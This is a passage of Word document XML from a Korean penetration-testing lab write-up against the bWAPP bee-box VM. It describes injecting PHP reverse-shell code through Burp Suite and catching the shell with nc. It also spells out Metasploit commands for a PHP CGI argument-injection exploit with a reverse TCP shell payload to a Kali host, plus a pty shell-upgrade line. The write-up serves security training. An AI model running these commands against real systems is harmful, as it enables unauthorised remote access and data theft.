              <w:t xml:space="preserve">그리고 </w:t>
            </w:r>
            <w:r w:rsidR="00AC76C2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정상적인 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00AC76C2">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00AC76C2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인 </w:t>
            </w:r>
            <w:r w:rsidR="00AC76C2">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00AC76C2">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>beebox_ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00AC76C2">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>]/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00AC76C2">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Bwapp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00AC76C2">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>/admin/</w:t>
            </w:r>
            <w:r w:rsidR="00AC76C2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에 접속 후 </w:t>
            </w:r>
            <w:r w:rsidR="00AC76C2">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>burp suite</w:t>
            </w:r>
            <w:r w:rsidR="00AC76C2">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>로 패킷을 잡고 있는다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17950A5F" w14:textId="77777777" w:rsidR="00AC76C2" w:rsidRPr="00AC76C2" w:rsidRDefault="00AC76C2" w:rsidP="00440B6B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</w:p>
          <w:p w14:paraId="6437221E" w14:textId="3B7A9321" w:rsidR="00440B6B" w:rsidRDefault="00AC76C2" w:rsidP="001A774C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noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="047D4C47" wp14:editId="48E19222">
                  <wp:extent cx="5983204" cy="3918858"/>
                  <wp:effectExtent l="0" t="0" r="0" b="571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6897" cy="397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6B396B" w14:textId="7486B54E" w:rsidR="00AC76C2" w:rsidRDefault="00AC76C2" w:rsidP="001A774C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</w:p>
          <w:p w14:paraId="6EE65FB4" w14:textId="2DD7AEC1" w:rsidR="00AC76C2" w:rsidRDefault="00AC76C2" w:rsidP="001A774C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/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>그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>후 Raw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에서 b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ody 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영역에 리버스 쉘을 연결하는 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>PH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P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코드를 삽입하면 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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명령어로 쉘 명령어 실행이 가능하다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="149F0BC2" w14:textId="77777777" w:rsidR="00AC76C2" w:rsidRDefault="00AC76C2" w:rsidP="001A774C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</w:p>
          <w:p w14:paraId="0AF278F2" w14:textId="10CD683A" w:rsidR="00AC76C2" w:rsidRDefault="00AC76C2" w:rsidP="001A774C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2430E5" wp14:editId="10AFF5FA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3400425</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="4322445" cy="154305"/>
                      <wp:effectExtent l="0" t="0" r="20955" b="17145"/>
                      <wp:wrapNone/>
                      <wp:docPr id="28" name="직사각형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2445" cy="15430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0151F" id="직사각형 28" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:16.55pt;margin-top:267.75pt;width:340.35pt;height:1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" filled="f" strokecolor="red" strokeweight="1.5pt"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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EB139D" wp14:editId="497C2035">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>219694</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>2206155</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="5438898" cy="178130"/>
                      <wp:effectExtent l="0" t="0" r="28575" b="12700"/>
                      <wp:wrapNone/>
                      <wp:docPr id="27" name="직사각형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38898" cy="17813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F4ACF2" id="직사각형 27" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:17.3pt;margin-top:173.7pt;width:428.25pt;height:14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" filled="f" strokecolor="red" strokeweight="1.5pt"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FCAD9EA" wp14:editId="39EC676C">
                  <wp:extent cx="5984459" cy="4037610"/>
                  <wp:effectExtent l="0" t="0" r="0" b="127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1431" cy="4055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AE89E5" w14:textId="3856FBCE" w:rsidR="00AC76C2" w:rsidRDefault="00AC76C2" w:rsidP="001A774C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</w:p>
          <w:p w14:paraId="7C06E31A" w14:textId="7C842298" w:rsidR="00AC76C2" w:rsidRDefault="00AC76C2" w:rsidP="001A774C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상단과 같이 작성 후,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 Forward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를 통해 잡았던 패킷을 보내주면,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다음과 같은 결과를 얻을 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74302324" w14:textId="77777777" w:rsidR="00AC76C2" w:rsidRDefault="00AC76C2" w:rsidP="001A774C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</w:p>
          <w:p w14:paraId="7D78EFE3" w14:textId="6117B4D0" w:rsidR="00AC76C2" w:rsidRDefault="00AC76C2" w:rsidP="001A774C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noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BC7F8A7" wp14:editId="3D486FBA">
                  <wp:extent cx="6068291" cy="3704590"/>
                  <wp:effectExtent l="0" t="0" r="889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4770" cy="3763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806BDF" w14:textId="44C3194E" w:rsidR="0046749D" w:rsidRDefault="0046749D" w:rsidP="001A774C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</w:p>
          <w:p w14:paraId="0BAE8FF8" w14:textId="3D87330D" w:rsidR="0046749D" w:rsidRDefault="00A7144E" w:rsidP="001A774C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다음은 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>KALI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의 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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메타스플로잇을</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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통해 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PHP CGI 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취약점을 이용한 쉘 권한을 얻는 것을 시도해보자.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="596B10A2" w14:textId="606D77CE" w:rsidR="007C06B4" w:rsidRDefault="007C06B4" w:rsidP="001A774C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처음 보는 서버를 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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모의해킹한다고</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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가정한다면,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서버가 </w:t>
            </w:r>
            <w:r w:rsidR="00945959">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>PHP CGI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취약점을 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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갖고있다는</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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것부터 확인해야 한다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68971F19" w14:textId="5F3ED9E7" w:rsidR="007C06B4" w:rsidRPr="007C06B4" w:rsidRDefault="007C06B4" w:rsidP="007C06B4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(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1) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007C06B4">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Nikto</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007C06B4">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>를 활용해 해당 웹 서버 분석을 시도한다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AECC01C" w14:textId="3D184EE3" w:rsidR="007C06B4" w:rsidRDefault="007C06B4" w:rsidP="001A774C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# </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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n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>ikto</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 -host [</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>beebox_ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="560C9E0D" w14:textId="77777777" w:rsidR="007C06B4" w:rsidRDefault="007C06B4" w:rsidP="001A774C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</w:p>
          <w:p w14:paraId="3430D1B4" w14:textId="4D1BA7B2" w:rsidR="007C06B4" w:rsidRPr="007C06B4" w:rsidRDefault="007C06B4" w:rsidP="001A774C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8FD310E" wp14:editId="1EF31614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2696845</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1112520" cy="163830"/>
                      <wp:effectExtent l="0" t="0" r="11430" b="26670"/>
                      <wp:wrapNone/>
                      <wp:docPr id="6" name="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520" cy="16383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0F318" id="직사각형 6" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:10pt;margin-top:212.35pt;width:87.6pt;height:12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" filled="f" strokecolor="red" strokeweight="1.5pt"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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ED9BCA3" wp14:editId="6EA2B921">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>3269615</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>1064895</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1112520" cy="163830"/>
                      <wp:effectExtent l="0" t="0" r="11430" b="26670"/>
                      <wp:wrapNone/>
                      <wp:docPr id="3" name="직사각형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520" cy="16383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3BCDD" id="직사각형 3" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:257.45pt;margin-top:83.85pt;width:87.6pt;height:12.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" filled="f" strokecolor="red" strokeweight="1.5pt"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1ECACB0A" wp14:editId="73A52C35">
                  <wp:extent cx="6098875" cy="29591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736" cy="2960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39D748" w14:textId="093A5B26" w:rsidR="007C06B4" w:rsidRDefault="007C06B4" w:rsidP="001A774C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</w:p>
          <w:p w14:paraId="1EC76752" w14:textId="7F9C49C3" w:rsidR="007C06B4" w:rsidRDefault="007C06B4" w:rsidP="001A774C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(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>2) CGI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취약점을 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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갖고있는</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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버전을 사용한다는 것을 확인했으니,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 </w:t>
            </w:r>
            <w:r w:rsidR="009F5893">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidR="009F5893">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>xploit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하</w:t>
            </w:r>
            <w:r w:rsidR="009F5893">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>여 공격해보자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.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F30C867" w14:textId="1336BE93" w:rsidR="0046749D" w:rsidRDefault="007C06B4" w:rsidP="001A774C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#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m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>sfconsole</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="5E9710EA" w14:textId="3F03959C" w:rsidR="007C06B4" w:rsidRDefault="007C06B4" w:rsidP="001A774C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/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>msf</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>6 &gt;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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 search </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>php_cgi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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     // </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>php_cgi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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로 시작하는 모듈을 검색한다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FB57D33" w14:textId="2F47F6EE" w:rsidR="007C06B4" w:rsidRDefault="007C06B4" w:rsidP="001A774C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/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>msf6 &gt; use exploit/multi/http/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>php_chi_arg_injection</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="76D8E1B3" w14:textId="2F451D88" w:rsidR="007C06B4" w:rsidRDefault="007C06B4" w:rsidP="007C06B4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&gt; set </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>rhost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>beebox</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="098AB424" w14:textId="682B15CB" w:rsidR="007C06B4" w:rsidRDefault="007C06B4" w:rsidP="007C06B4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&gt; </w:t>
            </w:r>
            <w:r w:rsidR="00173CBD">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00173CBD">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>targeturi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00173CBD">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00173CBD">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Bwapp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00173CBD">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>/admin/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57F00CCC" w14:textId="2F3F8D6A" w:rsidR="00173CBD" w:rsidRDefault="00173CBD" w:rsidP="007C06B4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/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>&gt; set payload generic/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>shell_reverse_tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3420E10B" w14:textId="52E00FC7" w:rsidR="00173CBD" w:rsidRDefault="00173CBD" w:rsidP="007C06B4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&gt; set </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>lhost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 [kali </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78CA33A9" w14:textId="5FAF6EB8" w:rsidR="00173CBD" w:rsidRDefault="00173CBD" w:rsidP="007C06B4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/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>&gt; exploit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68377497" w14:textId="37FF847F" w:rsidR="00173CBD" w:rsidRDefault="00173CBD" w:rsidP="007C06B4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(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3) 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정상적으로 세션이 연결되고,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리버스 쉘을 획득하였다.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이를 활용하여 원하는 정보를 탈취할 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="608AC45E" w14:textId="13A5F9E9" w:rsidR="009F5893" w:rsidRPr="00173CBD" w:rsidRDefault="00800586" w:rsidP="007C06B4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lastRenderedPageBreak/>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="009F5893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참고로 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리버스 쉘은 프롬프트가 없기 때문에 </w:t>
            </w:r>
            <w:r w:rsidR="009F5893">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">python -c ‘import </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="009F5893">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>pty;pty</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="009F5893">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>.spawn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="009F5893">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">(“/bin/bash”)’ </w:t>
            </w:r>
            <w:r w:rsidR="009F5893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구문을 통해 </w:t>
            </w:r>
            <w:r w:rsidR="009F5893">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>bash</w:t>
            </w:r>
            <w:r w:rsidR="009F5893">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>쉘을 적용할 수 있다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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A3E2E69" w14:textId="36F7406E" w:rsidR="003D753D" w:rsidRDefault="001A774C" w:rsidP="001A774C">
            <w:pPr>
              <w:jc w:val="righ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noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A5CF3BE" w14:textId="75E61E05" w:rsidR="008D5D37" w:rsidRPr="00BE7966" w:rsidRDefault="0046749D" w:rsidP="0080058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6385BB87" wp14:editId="229DEBF6">
                  <wp:extent cx="6245525" cy="3398442"/>
                  <wp:effectExtent l="0" t="0" r="3175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7326" cy="343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CBD" w14:paraId="60306603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7F9DB4DC" w14:textId="77777777" w:rsidR="00173CBD" w:rsidRPr="00800586" w:rsidRDefault="00173CBD" w:rsidP="001A774C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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13CE0F0D" w14:textId="77777777" w:rsidR="00C165CA" w:rsidRDefault="006F2E6D" w:rsidP="00C165CA">
      <w:pPr>
        <w:ind w:right="200"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
      <w: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C165CA" w:rsidRPr="00BE7966" w14:paraId="707B03E2" w14:textId="77777777" w:rsidTr="00C165CA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7B6BC53F" w14:textId="77777777" w:rsidR="00C165CA" w:rsidRPr="00BE7966" w:rsidRDefault="00C165CA" w:rsidP="00C165C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52A23016" wp14:editId="1F71F5D7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43" name="직사각형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43FED" id="직사각형 43" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-4.65pt;margin-top:-666.75pt;width:533.25pt;height:550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C165CA" w:rsidRPr="0050741D" w14:paraId="4FB9F941" w14:textId="77777777" w:rsidTr="00C165CA">
        <w:trPr>
          <w:trHeight w:val="445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3A50FB00" w14:textId="6434F660" w:rsidR="00C165CA" w:rsidRPr="0050741D" w:rsidRDefault="00C165CA" w:rsidP="00C165CA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4397E654" wp14:editId="71F0F8CB">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="margin">
                        <wp:posOffset>-37465</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="margin">
                        <wp:posOffset>-95885</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="6772275" cy="9843135"/>
                      <wp:effectExtent l="0" t="0" r="9525" b="5715"/>
                      <wp:wrapNone/>
                      <wp:docPr id="44" name="직사각형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843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241CA5" w14:textId="77777777" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="00C165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7E654" id="직사각형 44" o:spid="_x0000_s1027" style="position:absolute;margin-left:-2.95pt;margin-top:-7.55pt;width:533.25pt;height:775.0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" fillcolor="white [3212]" stroked="f" strokeweight="1pt">
                      <v:fill opacity="27499f"/>
                      <v:textbox>
                        <w:txbxContent>
                          <w:p w14:paraId="63241CA5" w14:textId="77777777" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="00C165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s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br w:type="page"/>
            </w:r>
            <w:r w:rsidRPr="0050741D">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대" w:hint="eastAsia"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r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</w:t>
            </w:r>
            <w:r w:rsidR="00841480">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대" w:hint="eastAsia"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00841480">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00841480">
              <w:rPr>
